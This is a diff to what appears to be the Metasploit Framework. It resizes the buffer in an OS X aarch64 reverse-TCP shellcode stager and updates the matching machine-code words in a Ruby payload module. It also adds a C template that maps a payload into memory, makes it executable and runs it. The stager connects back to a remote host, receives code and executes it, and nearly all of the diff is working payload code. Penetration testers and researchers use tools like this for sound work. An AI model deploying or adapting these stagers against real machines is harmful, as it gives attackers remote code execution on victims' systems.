diff --git a/external/source/shellcode/osx/aarch64/stager_sock_reverse.s b/external/source/shellcode/osx/aarch64/stager_sock_reverse.s index 10739fbbd2..3bc360ff47 100644 --- a/external/source/shellcode/osx/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/osx/aarch64/stager_sock_reverse.s @@ -20,9 +20,9 @@ .global _main _main: - /* mmap(addr=0, length=0x1000, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=-1, offset=0) */ + /* mmap(addr=0, length=328, prot=0x2 (PROT_WRITE), flags=0x1002 (MAP_PRIVATE | MAP_ANON), fd=-1, offset=0) */ mov x0, xzr - mov x1, #0x1000 + mov x1, #328 mov x2, #2 mov x3, #0x1002 mvn x4, xzr @@ -59,10 +59,10 @@ socket: svc 0 //cbnz w0, retry - /* recvfrom(sockfd='x13', address='x12', length=0x1000, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */ + /* recvfrom(sockfd='x13', address='x12', length=328, flags=0x40 (MSG_WAITALL), from=0, fromlenaddr=0) */ mov x0, x13 mov x1, x12 - mov x2, #0x1000 + mov x2, #328 mov x3, #0x40 mov x4, xzr mov x5, xzr @@ -70,9 +70,9 @@ socket: svc 0 //cbnz w0, retry - /* mprotect(addr, length=0x1000, prot=0x5 (PROT_READ | PROT_EXEC)) */ + /* mprotect(addr, length=328, prot=0x5 (PROT_READ | PROT_EXEC)) */ mov x0, x12 - mov x1, #0x1000 + mov x1, #328 mov x2, #5 ldr x16, =SYS_MPROTECT svc 0 diff --git a/external/source/shellcode/osx/template/Makefile b/external/source/shellcode/osx/template/Makefile new file mode 100644 index 0000000000..aabb8e5419 --- /dev/null +++ b/external/source/shellcode/osx/template/Makefile @@ -0,0 +1,4 @@ +.PHONY: templates +templates: template_aarch64_darwin + strip $^ + cp $^ ../../../../../data/$@/$^.bin diff --git a/external/source/shellcode/osx/template/template_aarch64_darwin.c b/external/source/shellcode/osx/template/template_aarch64_darwin.c new file mode 100644 index 0000000000..42070807a2 --- /dev/null +++ b/external/source/shellcode/osx/template/template_aarch64_darwin.c @@ -0,0 +1,18 @@ +#include +#include +#include +#include +#include + +char payload[8000] = "PAYLOAD:"; +int main() { + void *ptr = mmap(0, sizeof(payload), PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, -1, 0); + if (ptr == MAP_FAILED) { + return 0; + } + memcpy(ptr, payload, sizeof(payload)); + mprotect(ptr, sizeof(payload), PROT_READ | PROT_EXEC); + int (*sc)() = ptr; + sc(); + return 0; +} diff --git a/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb b/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb index 58e9979b7a..87ed79640e 100644 --- a/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb @@ -45,7 +45,7 @@ module MetasploitModule # Generated from external/source/shellcode/osx/aarch64/stager_sock_reverse.s # <_main>: 0xaa1f03e0, # mov x0, xzr - 0xd2820001, # mov x1, #4096 + 0xd2802901, # mov x1, #328 0xd2800042, # mov x2, #2 0xd2820043, # mov x3, #4098 0xaa3f03e4, # mvn x4, xzr @@ -74,14 +74,14 @@ module MetasploitModule 0xd4000001, # svc #0 0xaa0d03e0, # mov x0, x13 0xaa0c03e1, # mov x1, x12 - 0xd2820002, # mov x2, #4096 + 0xd2802902, # mov x2, #328 0xd2800803, # mov x3, #64 0xaa1f03e4, # mov x4, xzr 0xaa1f03e5, # mov x5, xzr 0x58000530, # ldr x16, 0x100003f98 0xd4000001, # svc #0 0xaa0c03e0, # mov x0, x12 - 0xd2820001, # mov x1, #4096 + 0xd2802901, # mov x1, #328 0xd28000a2, # mov x2, #5 0x580004d0, # ldr x16, 0x100003fa0 0xd4000001, # svc #0